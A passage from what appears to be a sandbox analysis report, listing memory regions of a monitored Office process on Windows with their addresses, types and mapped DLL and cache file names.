"c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 409 start_va = 0x8900000 end_va = 0x8900fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{c353f91e-d25f-48f0-a2cd-9f60b2681e9a}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{C353F91E-D25F-48F0-A2CD-9F60B2681E9A}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{c353f91e-d25f-48f0-a2cd-9f60b2681e9a}.2.ver0x0000000000000001.db") Region: id = 410 start_va = 0x8910000 end_va = 0x8913fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 411 start_va = 0x8920000 end_va = 0x8920fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{2f368d22-02bf-4413-97d1-c886cb140911}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{2F368D22-02BF-4413-97D1-C886CB140911}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{2f368d22-02bf-4413-97d1-c886cb140911}.2.ver0x0000000000000001.db") Region: id = 412 start_va = 0x8930000 end_va = 0x912ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000008930000" filename = "" Region: id = 413 start_va = 0x9130000 end_va = 0x952ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009130000" filename = "" Region: id = 414 start_va = 0x9530000 end_va = 0x962ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009530000" filename = "" Region: id = 415 start_va = 0x9630000 end_va = 0x963ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009630000" filename = "" Region: id = 416 start_va = 0x9640000 end_va = 0x9640fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009640000" filename = "" Region: id = 417 start_va = 0x9650000 end_va = 0x9657fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009650000" filename = "" Region: id = 418 start_va = 0x9660000 end_va = 0x9661fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mssvp.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\mssvp.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\mssvp.dll.mui") Region: id = 419 start_va = 0x96b0000 end_va = 0x96effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000096b0000" filename = "" Region: id = 420 start_va = 0x9750000 end_va = 0x978ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009750000" filename = "" Region: id = 421 start_va = 0x9790000 end_va = 0x97cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009790000" filename = "" Region: id = 422 start_va = 0x9810000 end_va = 0x984ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009810000" filename = "" Region: id = 423 start_va = 0x9850000 end_va = 0x988ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009850000" filename = "" Region: id = 424 start_va = 0x9890000 end_va = 0x98cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009890000" filename = "" Region: id = 425 start_va = 0x98e0000 end_va = 0x99dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000098e0000" filename = "" Region: id = 426 start_va = 0x99e0000 end_va = 0x9de0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000099e0000" filename = "" Region: id = 427 start_va = 0x9df0000 end_va = 0xa1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009df0000" filename = "" Region: id = 428 start_va = 0xa200000 end_va = 0xa600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a200000" filename = "" Region: id = 429 start_va = 0xa610000 end_va = 0xa80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a610000" filename = "" Region: id = 430 start_va = 0xa810000 end_va = 0xaccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a810000" filename = "" Region: id = 431 start_va = 0xacd0000 end_va = 0xb0cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000acd0000" filename = "" Region: id = 432 start_va = 0xb0e0000 end_va = 0xb11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b0e0000" filename = "" Region: id = 433 start_va = 0xb140000 end_va = 0xb17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b140000" filename = "" Region: id = 434 start_va = 0xb1b0000 end_va = 0xb1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b1b0000" filename = "" Region: id = 435 start_va = 0xb240000 end_va = 0xb27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b240000" filename = "" Region: id = 436 start_va = 0xb280000 end_va = 0xb37ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b280000" filename = "" Region: id = 437 start_va = 0xb380000 end_va = 0xb3bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b380000" filename = "" Region: id = 438 start_va = 0xb3c0000 end_va = 0xb4bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b3c0000" filename = "" Region: id = 439 start_va = 0xb500000 end_va = 0xb5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b500000" filename = "" Region: id = 440 start_va = 0xb670000 end_va = 0xb76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b670000" filename = "" Region: id = 441 start_va = 0xb7c0000 end_va = 0xb7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b7c0000" filename = "" Region: id = 442 start_va = 0xb830000 end_va = 0xb92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b830000" filename = "" Region: id = 443 start_va = 0xb970000 end_va = 0xb9affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b970000" filename = "" Region: id = 444 start_va = 0xb9b0000 end_va = 0xbaaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b9b0000" filename = "" Region: id = 445 start_va = 0xbae0000 end_va = 0xbbdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bae0000" filename = "" Region: id = 446 start_va = 0xbbe0000 end_va = 0xbd98fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 447 start_va = 0xbdd0000 end_va = 0xbe0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bdd0000" filename = "" Region: id = 448 start_va = 0xbe70000 end_va = 0xbf6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000be70000" filename = "" Region: id = 449 start_va = 0xbfc0000 end_va = 0xc7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bfc0000" filename = "" Region: id = 450 start_va = 0xc7c0000 end_va = 0xcb49fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c7c0000" filename = "" Region: id = 451 start_va = 0xcb70000 end_va = 0xcbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cb70000" filename = "" Region: id = 452 start_va = 0xcbe0000 end_va = 0xcc1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cbe0000" filename = "" Region: id = 453 start_va = 0xcc20000 end_va = 0xcc2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cc20000" filename = "" Region: id = 454 start_va = 0xcc30000 end_va = 0xcd2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cc30000" filename = "" Region: id = 455 start_va = 0xce20000 end_va = 0xcf1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000ce20000" filename = "" Region: id = 456 start_va = 0xcf30000 end_va = 0xd02ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cf30000" filename = "" Region: id = 457 start_va = 0xd030000 end_va = 0xd12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d030000" filename = "" Region: id = 458 start_va = 0xd130000 end_va = 0xd92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d130000" filename = "" Region: id = 459 start_va = 0xd960000 end_va = 0xda5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000d960000" filename = "" Region: id = 460 start_va = 0xdaa0000 end_va = 0xdadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000daa0000" filename = "" Region: id = 461 start_va = 0xdbd0000 end_va = 0xdccffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dbd0000" filename = "" Region: id = 462 start_va = 0xdd20000 end_va = 0xde1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000dd20000" filename = "" Region: id = 463 start_va = 0xde30000 end_va = 0xdf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000de30000" filename = "" Region: id = 464 start_va = 0xdf90000 end_va = 0xe08ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000df90000" filename = "" Region: id = 465 start_va = 0xe100000 end_va = 0xe1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e100000" filename = "" Region: id = 466 start_va = 0xe2b0000 end_va = 0xe3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e2b0000" filename = "" Region: id = 467 start_va = 0x373d0000 end_va = 0x373dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000373d0000" filename = "" Region: id = 468 start_va = 0x67800000 end_va = 0x67815fff monitored = 0 entry_point = 0x67801d6d region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\SysWOW64\\thumbcache.dll" (normalized: "c:\\windows\\syswow64\\thumbcache.dll") Region: id = 469 start_va = 0x67820000 end_va = 0x67835fff monitored = 0 entry_point = 0x67823c96 region_type = mapped_file name = "mapi32.dll" filename = "\\Windows\\SysWOW64\\mapi32.dll" (normalized: "c:\\windows\\syswow64\\mapi32.dll") Region: id = 470 start_va = 0x67840000 end_va = 0x678e5fff monitored = 0 entry_point = 0x678418b2 region_type = mapped_file name = "mssvp.dll" filename = "\\Windows\\SysWOW64\\mssvp.dll" (normalized: "c:\\windows\\syswow64\\mssvp.dll") Region: id = 471 start_va = 0x678f0000 end_va = 0x6794bfff monitored = 0 entry_point = 0x67924ab6 region_type = mapped_file name = "structuredquery.dll" filename = "\\Windows\\SysWOW64\\StructuredQuery.dll" (normalized: "c:\\windows\\syswow64\\structuredquery.dll") Region: id = 472 start_va = 0x67950000 end_va = 0x679effff monitored = 0 entry_point = 0x679518c6 region_type = mapped_file name = "searchfolder.dll" filename = "\\Windows\\SysWOW64\\SearchFolder.dll" (normalized: "c:\\windows\\syswow64\\searchfolder.dll") Region: id = 473 start_va = 0x679f0000 end_va = 0x67a83fff monitored = 0 entry_point = 0x679fd53d region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\SysWOW64\\msftedit.dll" (normalized: "c:\\windows\\syswow64\\msftedit.dll") Region: id = 474 start_va = 0x67a90000 end_va = 0x67ae7fff monitored = 0 entry_point = 0x67a915c0 region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\tiptsf.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 475 start_va = 0x67af0000 end_va = 0x67d18fff monitored = 0 entry_point = 0x67b29bb4 region_type = mapped_file name = "wxpnse.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\WXPNSE.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\wxpnse.dll") Region: id = 476 start_va = 0x67d20000 end_va = 0x67d36fff monitored = 0 entry_point = 0x67d21549 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 477 start_va = 0x67d50000 end_va = 0x67d58fff monitored = 0 entry_point = 0x67d5153e region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 478 start_va = 0x67d60000 end_va = 0x67d67fff monitored = 0 entry_point = 0x67d63c87 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 479 start_va = 0x67d70000 end_va = 0x67d7efff monitored = 0 entry_point = 0x67d712a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 480 start_va = 0x67d80000 end_va = 0x67d88fff monitored = 0 entry_point = 0x67d815a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 481 start_va = 0x67d90000 end_va = 0x67da0fff monitored = 0 entry_point = 0x67d91300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 482 start_va = 0x67db0000 end_va = 0x67decfff monitored = 0 entry_point = 0x67db10f5 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 483 start_va = 0x67df0000 end_va = 0x67e06fff monitored = 0 entry_point = 0x67df35fa region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 484 start_va = 0x68040000 end_va = 0x6804afff monitored = 0 entry_point = 0x68041200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 485 start_va = 0x68050000 end_va = 0x68068fff monitored = 0 entry_point = 0x68051319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 486 start_va = 0x68070000 end_va = 0x680dffff monitored = 0 entry_point = 0x68071f65 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 487 start_va = 0x680e0000 end_va = 0x68163fff monitored = 0 entry_point = 0x680e19a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 488 start_va = 0x68170000 end_va = 0x681a0fff monitored = 0 entry_point = 0x6817a8b6 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\SysWOW64\\EhStorShell.dll" (normalized: "c:\\windows\\syswow64\\ehstorshell.dll") Region: id = 489 start_va = 0x681b0000 end_va = 0x68a2dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\1033\\grooveintlresource.dll") Region: id = 490 start_va = 0x68a30000 end_va = 0x68a7efff monitored = 0 entry_point = 0x68a31452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 491 start_va = 0x68a80000 end_va = 0x68ad7fff monitored = 0 entry_point = 0x68a813b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 492 start_va = 0x68ae0000 end_va = 0x68af4fff monitored = 0 entry_point = 0x68ae11fa region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\SysWOW64\\cabinet.dll" (normalized: "c:\\windows\\syswow64\\cabinet.dll") Region: id = 493 start_va = 0x68b00000 end_va = 0x68b06fff monitored = 0 entry_point = 0x68b01120 region_type = mapped_file name = "wsock32.dll" filename = "\\Windows\\SysWOW64\\wsock32.dll" (normalized: "c:\\windows\\syswow64\\wsock32.dll") Region: id = 494 start_va = 0x68b10000 end_va = 0x68b29fff monitored = 0 entry_point = 0x68b12bfe region_type = mapped_file name = "loggingplatform.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\LoggingPlatform.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\loggingplatform.dll") Region: id = 495 start_va = 0x68b30000 end_va = 0x68ba7fff monitored = 0 entry_point = 0x68b41ac0 region_type = mapped_file name = "telemetry.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\Telemetry.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\telemetry.dll") Region: id = 496 start_va = 0x68bb0000 end_va = 0x68c81fff monitored = 0 entry_point = 0x68bbee84 region_type = mapped_file name = "msvcr110.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\msvcr110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\msvcr110.dll") Region: id = 497 start_va = 0x68c90000 end_va = 0x68d14fff monitored = 0 entry_point = 0x68cca901 region_type = mapped_file name = "msvcp110.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\msvcp110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\msvcp110.dll") Region: id = 498 start_va = 0x68d20000 end_va = 0x68d6ffff monitored = 0 entry_point = 0x68d26277 region_type = mapped_file name = "filesyncshell.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\FileSyncShell.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\filesyncshell.dll") Region: id = 499 start_va = 0x68d70000 end_va = 0x68e6afff monitored = 0 entry_point = 0x68d817e1 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\SysWOW64\\WindowsCodecs.dll" (normalized: "c:\\windows\\syswow64\\windowscodecs.dll") Region: id = 500 start_va = 0x68e70000 end_va = 0x68ec0fff monitored = 0 entry_point = 0x68e9988c region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\SysWOW64\\winspool.drv" (normalized: "c:\\windows\\syswow64\\winspool.drv") Region: id = 501 start_va = 0x68ed0000 end_va = 0x696c4fff monitored = 0 entry_point = 0x68f35279 region_type = mapped_file name = "chart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\CHART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\chart.dll") Region: id = 502 start_va = 0x696d0000 end_va = 0x696fcfff monitored = 0 entry_point = 0x696e62dc region_type = mapped_file name = "osppc.dll" filename = "\\Program Files (x86)\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\OSPPC.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\officesoftwareprotectionplatform\\osppc.dll") Region: id = 503 start_va = 0x69700000 end_va = 0x69707fff monitored = 0 entry_point = 0x69702ca6 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\SysWOW64\\npmproxy.dll" (normalized: "c:\\windows\\syswow64\\npmproxy.dll") Region: id = 504 start_va = 0x69710000 end_va = 0x69769fff monitored = 0 entry_point = 0x69711f35 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\SysWOW64\\netprofm.dll" (normalized: "c:\\windows\\syswow64\\netprofm.dll") Region: id = 505 start_va = 0x69770000 end_va = 0x69911fff monitored = 0 entry_point = 0x69771000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\riched20.dll") Region: id = 506 start_va = 0x69920000 end_va = 0x699acfff monitored = 1 entry_point = 0x69932860 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 507 start_va = 0x699b0000 end_va = 0x699f9fff monitored = 1 entry_point = 0x699b2e54 region_type = mapped_file name = "mscoree.dll" filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll") Region: id = 508 start_va = 0x69a00000 end_va = 0x69a07fff monitored = 0 entry_point = 0x69a010e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 509 start_va = 0x69a10000 end_va = 0x69b19fff monitored = 0 entry_point = 0x69aa146c region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 510 start_va = 0x69b20000 end_va = 0x69c94fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 511 start_va = 0x69ca0000 end_va = 0x69caefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msointl30.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\1033\\msointl30.dll") Region: id = 512 start_va = 0x69cb0000 end_va = 0x69d32fff monitored = 0 entry_point = 0x69ce791c region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 513 start_va = 0x69d40000 end_va = 0x69e6bfff monitored = 0 entry_point = 0x69e45cf2 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 514 start_va = 0x69e70000 end_va = 0x69ea9fff monitored = 0 entry_point = 0x69e8fab7 region_type = mapped_file name = "d3d10_1core.dll" filename = "\\Windows\\SysWOW64\\d3d10_1core.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1core.dll") Region: id = 515 start_va = 0x69eb0000 end_va = 0x69edbfff monitored = 0 entry_point = 0x69ed01f8 region_type = mapped_file name = "d3d10_1.dll" filename = "\\Windows\\SysWOW64\\d3d10_1.dll" (normalized: "c:\\windows\\syswow64\\d3d10_1.dll") Region: id = 516 start_va = 0x69ee0000 end_va = 0x6ed1efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msores.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSORES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\msores.dll") Region: id = 517 start_va = 0x6ed20000 end_va = 0x6f640fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso99lres.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO99LRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso99lres.dll") Region: id = 518 start_va = 0x6f650000 end_va = 0x6f957fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "mso40uires.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\MSO40UIRES.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso40uires.dll") Region: id = 519 start_va = 0x6f960000 end_va = 0x6f9e2fff monitored = 0 entry_point = 0x6f9713b0 region_type = mapped_file name = "dxgi.dll" filename = "\\Windows\\SysWOW64\\dxgi.dll" (normalized: "c:\\windows\\syswow64\\dxgi.dll") Region: id = 520 start_va = 0x6f9f0000 end_va = 0x6fa18fff monitored = 0 entry_point = 0x6f9f6b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 521 start_va = 0x6fa20000 end_va = 0x6fa2cfff monitored = 0 entry_point = 0x6fa211e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 522 start_va = 0x6fa30000 end_va = 0x6fae9fff monitored = 0 entry_point = 0x6fa9253f region_type = mapped_file name = "d2d1.dll" filename = "\\Windows\\SysWOW64\\d2d1.dll" (normalized: "c:\\windows\\syswow64\\d2d1.dll") Region: id = 523 start_va = 0x6fff0000 end_va = 0x6fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000006fff0000" filename = "" Region: id = 524 start_va = 0x708b0000 end_va = 0x708d0fff monitored = 0 entry_point = 0x708bc008 region_type = mapped_file name = "sppc.dll" filename = "\\Windows\\SysWOW64\\sppc.dll" (normalized: "c:\\windows\\syswow64\\sppc.dll") Region: id = 525 start_va = 0x708e0000 end_va = 0x708e9fff monitored = 0 entry_point = 0x708e4d20 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 526 start_va = 0x708f0000 end_va = 0x70e87fff monitored = 0 entry_point = 0x708f1000 region_type = mapped_file name = "mso99lwin32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso99Lwin32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso99lwin32client.dll") Region: id = 527 start_va = 0x70e90000 end_va = 0x715a4fff monitored = 0 entry_point = 0x70e91000 region_type = mapped_file name = "mso40uiwin32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso40UIwin32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso40uiwin32client.dll") Region: id = 528 start_va = 0x715b0000 end_va = 0x718b1fff monitored = 0 entry_point = 0x715b1000 region_type = mapped_file name = "mso30win32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso30win32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso30win32client.dll") Region: id = 529 start_va = 0x718c0000 end_va = 0x71a94fff monitored = 0 entry_point = 0x718c1000 region_type = mapped_file name = "mso20win32client.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX86\\Microsoft Shared\\OFFICE16\\Mso20win32client.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx86\\microsoft shared\\office16\\mso20win32client.dll") Region: id = 530 start_va = 0x71aa0000 end_va = 0x71c2ffff monitored = 0 entry_point = 0x71b3d026 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\\gdiplus.dll") Region: id = 531 start_va = 0x71c30000 end_va = 0x72821fff monitored = 0 entry_point = 0x71c31000 region_type = mapped_file name = "oart.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\Office16\\OART.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\office16\\oart.dll") Region: id = 532 start_va = 0x72830000 end_va = 0x72832fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Program Files (x86)\\Microsoft 